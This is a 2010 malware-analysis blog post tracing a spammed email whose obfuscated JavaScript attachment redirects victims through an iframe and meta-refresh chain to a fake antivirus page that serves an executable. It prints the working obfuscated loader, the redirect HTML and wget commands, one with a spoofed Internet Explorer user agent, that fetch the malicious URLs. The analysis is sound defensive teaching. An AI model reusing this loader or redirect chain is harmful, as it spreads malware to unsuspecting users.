03.11.2010 13:01

Yet another current fake AV infection

Tiny report of a yet another current fake AV infection which is being spammed out via Email.

Warning: do not try to reproduce these results on a Windows PC unless you know what you are doing. As of the time of this writing, the URLs mentioned in this report are live and contain malware.

Background

Today the following Email (with attached Javascript file) caught my attention:
From:     Andres Pratt <asiaticshqz83@royalhighgate.com>
 Subject:     Vacation Care Payment Program - September 2010
 Date:     September 20, 2010 3:55:08 PM GMT+02:00
 To:     mymailinglist-owner@lists.YYYYYY.org
 Return-Path:     <mailman-bounces@lists.YYYYYY.org>
 X-Original-To:     aaron@XXXXXX.org
 Delivered-To:     aaron@XXXXXX.org
 X-Policyd-Weight:     using cached result; rate:hard: -7.6
 Received:     from abc.YYYYYY.org (abc.YYYYYY.org [1.2.3.4]) by mailserver.XXXXXX.org (Postfix)
    with ESMTP id 919B6CE21B0 for <aaron@XXXXXX.org>; Mon, 20 Sep 2010 14:55:19 +0200 (CEST)
 Received:     from localhost ([127.0.0.1] helo=abc.YYYYYY.org) by abc.YYYYYY.org with esmtp
   (Exim 4.63) (envelope-from <mailman-bounces@lists.YYYYYY.org>) id 1Oxftv-000581-5y; Mon,
    20 Sep 2010 14:55:19 +0200
 Received:     from [109.228.248.243] (helo=LOSHAZXPVC) by abc.YYYYYY.org with esmtp
   (Exim 4.63) (envelope-from <asiaticshqz83@royalhighgate.com>) id 1Oxftq-00057e-Ki; Mon,
   20 Sep 2010 14:55:17 +0200
 Received:     from mta003.royalhighgate.com (mta298.royalhighgate.com [66.231.92.249]) by
   mail.royalhighgate.com (8.13.2+Sun/8.13.9) with ESMTP id 36ij9391558267 for
   <mymailinglist-owner@lists.YYYYYY.org>; Mon, 20 Sep 2010 15:55:08 +0200
 Message-Id:     <41060351.52314783258024343.JavaMail.pc1@nielu8.royalhighgate.com>
 Mime-Version:     1.0
 Content-Type:     multipart/mixed; boundary="----=_Part_8807_43917428.1091380632604"
 X-Spam-Checker-Version:     SpamAssassin 3.1.7-deb3 (2006-10-05) on  abc.YYYYYY.org
 X-Spam-Level:     **
 X-Spam-Status:     No, score=2.9 required=5.0 tests=BAYES_50,HTML_MESSAGE,
   RCVD_IN_BSP_OTHER,RCVD_IN_PBL,RCVD_IN_SORBS_WEB autolearn=no  version=3.1.7-deb3
 Sender:     mailman-bounces@lists.YYYYYY.org
 Errors-To:     mailman-bounces@lists.YYYYYY.org
 X-Sa-Exim-Connect-Ip:     127.0.0.1
 X-Sa-Exim-Mail-From:     mailman-bounces@lists.YYYYYY.org
 X-Sa-Exim-Scanned:     No (on abc.YYYYYY.org); SAEximRunCond expanded to false
<pre>HI All,</pre> <pre>Attached is the program and payments program for the upcoming vacation care. As I will be absent over this time I trying to ensure all is well organized for the team. Could you please confirm how you wish to pay for the events as listed.</pre>
[Attached Javascript]
As I was curious I just simply looked at the Javascript and wanted to determine what new variant of maliciousness the spammers came up with today. For the sake of documentation for others, I further decided to write down the results of this mini- analysis in the hope that others can learn from it.

Let's first concentrate on the mail itself: if you look at the IP addresses above, the mail went from 66.231.92.249 to 109.228.248.243 and then to a mailing list (mailman) at YYYYYY.org (which refused it and generated a bounce to me since my email address is in the "mailman-bounces" alias). So far we can only determine that the mail went from 66.231.92.249 (Exact Target Inc. In Indianapolis) to MILLENICOM-DSLNET2 (DSL range in Turkey, probably an infected PC) So far so good, we don't get much information from this.

But more interesting than the mail is the actual attached Javascript. Let's take a look at it:

<script language="JavaScript" type="text/javascript">function uvru(xdkz){var
 trzu=" oq0-fbinrxehc:v>.=\"/pa;gtusml<",t998,k5qe,t7ah="",dhyp,bbwn=trzu.length;
eval(unescape("%66un%63ti%6Fn l%75bx%28vk%76v){%747a%68+=%76kvv%7D"));
for(dhyp=0;dhyp<xdkz.length;dhyp++){t998=xdkz.charAt(dhyp);k5qe=trzu.indexOf(t998);
if(k5qe>-1){k5qe-=(dhyp+1)%bbwn;if(k5qe<0){k5qe+=bbwn;}lubx(trzu.charAt(k5qe));
}else{lubx(t998);}}eval(t7ah); eval(unescape("%64oc%75me%6Et.w%72it%65(t%37ah)%3Bt7%61h=%22%22;"));
}uvru(" <:lsb\"q0 v;vra -bm u 0/b:sx<ithxmagr<0=nlginf<bisps/0=0bi:<ngph/><0fsr<s");
</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
Of course, the malware authors exepect that the unsuspecting user will click on the Mail attachment and thus this piece of HTML/JavaScript would be executed from within a browser. At first sight this Javascript is short but totally unreadable. So how do we unobfuscate this Javascript without triggering any malicious side effects? It turns out that simplly replacing "eval" by "alert" produces the proper results when you execute the JavaScript in the browser:
<script language="JavaScript" type="text/javascript">function uvru(xdkz){var
 trzu=" oq0-fbinrxehc:v>.=\"/pa;gtusml<",t998,k5qe,t7ah="",dhyp,bbwn=trzu.length;
eval(unescape("%66un%63ti%6Fn l%75bx%28vk%76v){%747a%68+=%76kvv%7D"));
for(dhyp=0;dhyp<xdkz.length;dhyp++){t998=xdkz.charAt(dhyp);k5qe=trzu.indexOf(t998);
if(k5qe>-1){k5qe-=(dhyp+1)%bbwn;if(k5qe<0){k5qe+=bbwn;}lubx(trzu.charAt(k5qe));
}else{lubx(t998);}}alert(t7ah);alert(unescape("%64oc%75me%6Et.w%72it%65(t%37ah)%3Bt7%61h=%22%22;"));
}uvru(" <:lsb\"q0 v;vra -bm u 0/b:sx<ithxmagr<0=nlginf<bisps/0=0bi:<ngph/><0fsr<s");
</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
Please observe that the first eval() was left intact. The first eval() actually just "decoded" a function which is called later. But how does this trick with alert() actually work? The alert() function shows the result of the code that would be executed by eval by evaluating it without executing the code. Instead of executing it, it will simply show a alert box with the contents of the code.

The result of the alert() function is:

Pic1: document.write(t7ah);t7ah="";

So we now know that the variable t7ah would be written to the web browser (the DOM tree). The next question is, what ist he value of the t7ah variable? Again, the same trick works! The second alert() does the trick.

Another alert(t7ah); shows its contents:

Pic2: the contents of the t7ah Variable

So, we effectively cracked the Jaascript obfuscation! Therefore, we now know that the Javascript tells the browser to go to http://nobletree.org/x.html via a HTTP refresh.

Ok, so let's go to http://nobletree.org/x.html ourselves (manually):

$ wget http://nobletree.org/x.html
The Unix tool wget has the advantage that no unexpected Javascript will be executed. It just simply fetches the file.

Here is the content of the x.html file:

PLEASE WAITING.... 4 SECONDS
 <meta http-equiv="refresh" content="4;url=http://scaner-high.cz.cc/scanner10/?afid=24" />
 <iframe width="0" height="0" src="http://finwizonline.com/news/"></iframe>
Obviously the attackers will redirect us again to two new URLs. So we can now take a look at these two domains:
$ host scaner-high.cz.cc
 scaner-high.cz.cc has address 91.211.119.162
$ whois 91.211.119.162
 #
 % Information related to '91.211.116.0 - 91.211.119.255'
inetnum:        91.211.116.0 - 91.211.119.255
 netname:        net-0x2a
 descr:          Zharkov Mukola Mukolayovuch
 remarks:        Datacentre "0x2a"
 country:        UA
 org:            ORG-PEZM1-RIPE
 admin-c:        ZN210-RIPE
 tech-c:         ZN210-RIPE
 status:         ASSIGNED PI
 mnt-by:         RIPE-NCC-HM-PI-MNT
 mnt-lower:      RIPE-NCC-HM-PI-MNT
 mnt-by:         ONIK-MNT
 mnt-routes:     ONIK-MNT
 mnt-domains:    ONIK-MNT
 source:         RIPE # Filtered
organisation:   ORG-PEZM1-RIPE
 org-name:       Private Entreprise Zharkov Mukola Mukolayovuch
 org-type:       OTHER
 address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
 e-mail:         support@0x2a.com.ua
 admin-c:        ZN210-RIPE
 phone:          +38-044 587-83-16
 mnt-ref:        ONIK-MNT
 mnt-by:         ONIK-MNT
 source:         RIPE # Filtered
person:         Zharkov Nikolay
 address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
 phone:          +38-044 587-83-16
 nic-hdl:        ZN210-RIPE
 mnt-by:         ONIK-MNT
 source:         RIPE # Filtered
% Information related to '91.211.116.0/22AS48587'
Looks suspicious!

But for the sake of completeness, let's also first get the iframe from above:

$ host finwizonline.com
 finwizonline.com has address 24.2.14.131     (comcast)
 finwizonline.com has address 174.58.192.19   (comcast)
 finwizonline.com has address 76.205.64.19    (AT&T PPP Pool)
 finwizonline.com has address 71.192.136.228  (comcast Boston)
 finwizonline.com has address 68.34.109.188   (comcast)
The author could not get any data from the finwizonline.com/news iframe regardless of which useragent string (IE 6.0 for example) was chosen. Possibly the website was taken down already.

So let us go back to the scaner-high.cz.cc URL:

$ wget -U "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)" \
  "http://scaner-high.cz.cc/scanner10/?afid=24"
This shows us a nice fake Antivirus screen!
$ more index.html\?afid\=24
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <meta http-equiv="Content-Language" content="en" />
 <meta http-equiv="Cache-control" content="Public" />
<title>My Windows Online Scanner</title>
 <link rel="icon" href="https://www.cert.at/assets/5b9c863d//Images/favicon.gif" type="image/gif" />
<style type="text/css" media="screen">
 #loading {
 height:auto;
 left:45%;
 padding:2px;
 position:absolute;
 top:40%;
 z-index:20001;
 }
 #loading a {
 color:#225588;
 }
 #loading .loading-indicator {
 -x-system-font:none;
 background:white none repeat scroll 0 0;
 color:#444444;
 font-family:tahoma,arial,helvetica;
 font-size:13px;
 font-size-adjust:none;
 font-stretch:normal;
 font-style:normal;
 font-variant:normal;
 font-weight:bold;
 height:auto;
 line-height:normal;
 margin:0;
 padding:10px;
 }
 #loading-msg {
 -x-system-font:none;
 font-family:arial,tahoma,sans-serif;
 font-size:10px;
 font-size-adjust:none;
 font-stretch:normal;
 font-style:normal;
 font-variant:normal;
 font-weight:normal;
 line-height:normal;
 }
 </style>
 <script type="text/javascript">
 <!--//<![CDATA[
 var LinkSoftDown = "/go/?afid=24&time=1284989690";
 function ext(){window.open( "/go/?afid=24&time=1284989690", "_blank",
  "toolbar=0,titlebar=0,scrollbars=0,status=0,location=0,menubar=0,width=100,
   height=100,left=0,top=0");}
 if (window.attachEvent) eval("window.attachEvent('onunload',ext);");
 else window.addEventListener("unload", ext, false);
 //]]>-->
 </script>
 </head>
 <body>
 <div id="loading" style="display:block">
 <div class="loading-indicator">
 <img height="50" width="50" style="margin-right: 8px; float: left;
  vertical-align: top;" src="https://www.cert.at/assets/5b9c863d//Images/loading.gif"/>
 <br/>
 <span id="loading-msg">Initializing Virus Protection System...</span></div>
 </div>
 <script type="text/javascript" src="https://www.cert.at/scanner10/codejs">
 </script>
 </body>
 </html>
And of course - in a very efficient manner - as soon as you download and follow the http://scaner-high.cz.cc/go/?afid=24&time=1284989690 URL, a binary .EXE file will try to run on your PC! Next I wanted to see if Virustotal.com or other AV engines already know the binary.
http://www.virustotal.com/file-scan/report.html?id=de7262bf81a9d791d80986f785c795edf02ac0ba7c39cd89fb9021f8a6228e5f-1284989236
Shows that this is a rather well known piece of malware. It is well detected. 65% of all AV engines detect this fake AV at the time of this writing.

The next step of course would be to reverse engineer this malware but - I leave it as it is right now. Nothing really new.

So far the author only managed to download the binary .EXE file if the user agent string matches as shown above.

The Webserver serving the malware runs on nginx/0.7.65 As said above, we had to fake the User Agent string to "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)". A very practical tool to fake UA strings is "UserAgent Switcher" for Firefox. This way the author could download the samples from a regular Linux PC.

Fake AV User Experience

Pic 3: a pop-up box appears and warns the user that his computer is "infected". Please note that this screenshot was of course done on e Linux System as to not infect the host.

If the user clicks OK here, then he is redirected to this page, which looks like a Windows window alerting him of malware:

Pic 4: a web page looking like a regular Windows Window. Non computer savvy people would fall for this trick.

Finally if the user clicks on "remove all" he will receive a .EXE file called "antivirus.exe" which is the very same binary that we were able to download via wget before.

Author: L. Aaron Kaplan